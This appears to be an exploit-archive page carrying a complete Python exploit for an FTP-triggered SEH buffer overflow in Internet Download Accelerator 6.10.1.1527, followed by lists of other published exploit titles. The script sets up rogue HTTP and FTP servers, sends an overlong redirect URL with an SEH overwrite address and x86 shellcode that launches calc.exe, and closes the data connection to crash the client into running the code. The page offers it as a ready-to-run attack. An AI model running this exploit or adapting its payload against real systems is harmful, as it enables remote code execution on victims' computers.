"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)"

Author

Exploit author

"Fady Mohammed Osman"

Platform

Exploit platform

windows

Release date

Exploit published date

2017-01-02

                
                    
                         Download file
                    
                
            
#!/usr/bin/python
#
# Exploit Title: IDA 6.10.1.1527 FTP SEH Universal exploit.
# Exploit Author: Fady Mohamed Osman (@fady_osman)
# Exploit-db : http://www.exploit-db.com/author/?a=2986
# Youtube : https://www.youtube.com/user/cutehack3r
# Date: Jan 2, 2017
# Vendor Homepage: http://westbyte.com/
# Software Link: http://westbyte.com/index.phtml?page=support&tmp=1&lng=English&product=Internet%20Download%20Accelerator.
# Version: 6.10.1.1527
# Tested on: IDA 6.10.1.1527 Free Version - Windows 7 SP1 - Windows 10.
# --------------
# Internet download accelerator suffers from a BOF when an FTP Download of file with
# long name fails.
# --------------
# To Exploit this issue:
# 1- Run HTTP server that will redirect to the FTP file with long name.
# 2- The ftp server will answer to the commands sent then will open a data connection.
# 3- The script will send an empty file list and close the connection to trigger the BOF condition.
# 5- Happy new year :D.

import SocketServer
import threading


# IP to listen to, needed to construct PASV response so 0.0.0.0 is not gonna work.
ip = "192.168.1.100"
ipParts = ip.split(".")
PasvResp = "("+ ipParts[0]+ "," + ipParts[1]+ "," + ipParts[2] + "," + ipParts[3] + ",151,130)"
# Run Calc.exe
buf=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")





class HTTPHandler(SocketServer.BaseRequestHandler):
    """
    The request handler class for our HTTP server.

    This is just so we don't have to provide a suspicious FTP link with long name.
    """

    def handle(self):
        # self.request is the TCP socket connected to the client
        self.data = self.request.recv(1024).strip()
        print "[*] Recieved HTTP Request"
        print "[*] Sending Redirction To FTP"
        # just send back the same data, but upper-cased
	# SEH Offset 336 - 1056 bytes for the payload - 0x10011b53 unzip32.dll ppr 0x0c
	payload = "ftp://192.168.1.100/"+ 'A' * 336 + "\xeb\x06\x90\x90" + "\x53\x1b\x01\x10" + buf + "B" * (1056 - len(buf))
	self.request.sendall("HTTP/1.1 302 Found\r\n" +
	"Host: Server\r\nConnection: close\r\nLocation: "+ 
	payload+
	"\r\nContent-type: text/html; charset=UTF-8\r\n\r\n")
	print "[*] Redirection Sent..."

class FTPHandler(SocketServer.BaseRequestHandler):
    """
    The request handler class for our FTP server.

    This will work normally and open a data connection with IDA.
    """

    def handle(self):
        # User Command
	self.request.sendall("220 Nasty FTP Server Ready\r\n")
	User = self.request.recv(1024).strip()
        print "[*] Recieved User Command: " + User
	self.request.sendall("331 User name okay, need password\r\n")	
	# PASS Command
        Pass = self.request.recv(1024).strip()
        print "[*] Recieved PASS Command: " + Pass
	self.request.sendall("230-Password accepted.\r\n230 User logged in.\r\n")
        # SYST Command
	Syst = self.request.recv(1024).strip()
        print "[*] Recieved SYST Command: " + Syst
	self.request.sendall("215 UNIX Type: L8\r\n")
	# TYPE Command
	Type = self.request.recv(1024).strip()
	print "[*] Recieved Type Command: " + Type
	self.request.sendall("200 Type set to I\r\n")
	# REST command
	Rest = self.request.recv(1024).strip()
	print "[*] Recieved Rest Command: " + Rest
	self.request.sendall("200 OK\r\n")
	# CWD command
	Cwd = self.request.recv(2048).strip()
	print "[*] Recieved CWD Command: " + Cwd
	self.request.sendall("250 CWD Command successful\r\n")
	
	# PASV command.
	Pasv = self.request.recv(1024).strip()
	print "[*] Recieved PASV Command: " + Pasv
	self.request.sendall("227 Entering Passive Mode " + PasvResp + "\r\n")

	#LIST	
	List = self.request.recv(1024).strip()
	print "[*] Recieved LIST Command: " + List
	self.request.sendall("150 Here comes the directory listing.\r\n226 Directory send ok.\r\n")
	
	


class FTPDataHandler(SocketServer.BaseRequestHandler):
    """
    The request handler class for our FTP Data connection.

    This will send useless response and close the connection to trigger the error.
    """

    def handle(self):
        # self.request is the TCP socket connected to the client
        print "[*] Recieved FTP-Data Request"
        print "[*] Sending Empty List"
        # just send back the same data, but upper-cased
	self.request.sendall("total 0\r\n\r\n")
	self.request.close()


if __name__ == "__main__":
    HOST, PORT = ip, 8000
    SocketServer.TCPServer.allow_reuse_address = True

    print "[*] Starting the HTTP Server."
    # Create the server, binding to localhost on port 8000
    HTTPServer = SocketServer.TCPServer((HOST, PORT), HTTPHandler)

    # Running the http server (using a thread so we can continue and listen for FTP and FTP-Data).
    HTTPThread = threading.Thread(target=HTTPServer.serve_forever)
    HTTPThread.daemon = True
    HTTPThread.start()
    
    print "[*] Starting the FTP Server."
    # Running the FTP server.
    FTPServer = SocketServer.TCPServer((HOST, 21), FTPHandler)

    # Running the FTP server thread.
    FTPThread = threading.Thread(target=FTPServer.serve_forever)
    FTPThread.daemon = True
    FTPThread.start()

    print "[*] Opening the data connection."
    # Opening the FTP data connection - DON'T CHANGE THE PORT.
    FTPData = SocketServer.TCPServer((HOST, 38786), FTPHandler)

    # Running the FTP Data connection Thread.
    DataThread = threading.Thread(target=FTPData.serve_forever)
    DataThread.daemon = True
    DataThread.start()

    print "[*] Listening for FTP Data."
    # Making the main thread wait.
    print "[*] To exit the script please press any key at any time."
    raw_input()

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"
2020-12-02	"PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS"	webapps	windows	"Amin Rawah"
2020-12-02	"Microsoft Windows - Win32k Elevation of Privilege"	local	windows	nu11secur1ty
2020-12-01	"Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path"	local	windows	"Emmanuel Lujan"
2020-12-01	"Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path"	local	windows	Jok3r
2020-12-01	"Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path"	local	windows	"Metin Yunus Kandemir"
2020-12-01	"10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)"	local	windows	Sectechs
2020-12-01	"EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path"	local	windows	SamAlucard
2020-11-30	"YATinyWinFTP - Denial of Service (PoC)"	remote	windows	strider

Release Date	Title	Type	Platform	Author
2019-01-25	"Lua 5.3.5 - 'debug.upvaluejoin' Use After Free"	dos	multiple	"Fady Mohammed Osman"
2017-01-21	"Microsoft Power Point 2016 - Java Code Execution"	local	windows	"Fady Mohammed Osman"
2017-01-17	"Check Box 2016 Q2 Survey - Multiple Vulnerabilities"	webapps	aspx	"Fady Mohammed Osman"
2017-01-02	"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)"	remote	windows	"Fady Mohammed Osman"
2015-06-29	"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Change"	webapps	hardware	"Fady Mohammed Osman"
2015-06-29	"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Disclosure"	webapps	hardware	"Fady Mohammed Osman"
2015-04-27	"Apple iTunes 10.6.1.7 - '.pls' Title Buffer Overflow"	local	windows	"Fady Mohammed Osman"
2015-03-24	"Bsplayer 2.68 - HTTP Response Universal"	remote	windows	"Fady Mohammed Osman"
2014-12-02	"ProjectSend r-561 - Arbitrary File Upload"	webapps	php	"Fady Mohammed Osman"
2014-12-02	"SQL Buddy 1.3.3 - Remote Code Execution"	webapps	php	"Fady Mohammed Osman"
2014-10-06	"Bash CGI - 'Shellshock' Remote Command Injection (Metasploit)"	webapps	cgi	"Fady Mohammed Osman"
2011-12-27	"CoCSoft Stream Down 6.8.0 - Universal (Metasploit)"	remote	windows	"Fady Mohammed Osman"
2010-12-06	"WinZip 15.0 - WZFLDVW.OCX IconIndex Property Denial of Service"	dos	windows	"Fady Mohammed Osman"
2010-12-06	"WinZip 15.0 - WZFLDVW.OCX Text Property Denial of Service"	dos	windows	"Fady Mohammed Osman"
2010-08-14	"Saurus CMS Admin Panel - Multiple Cross-Site Request Forgery Vulnerabilities"	webapps	php	"Fady Mohammed Osman"

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.